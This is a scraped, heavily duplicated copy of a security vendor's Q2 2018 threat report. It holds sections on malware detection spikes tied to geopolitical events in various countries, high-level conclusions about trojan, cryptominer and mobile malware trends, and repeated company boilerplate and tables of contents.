REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free." Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news," Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."
7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
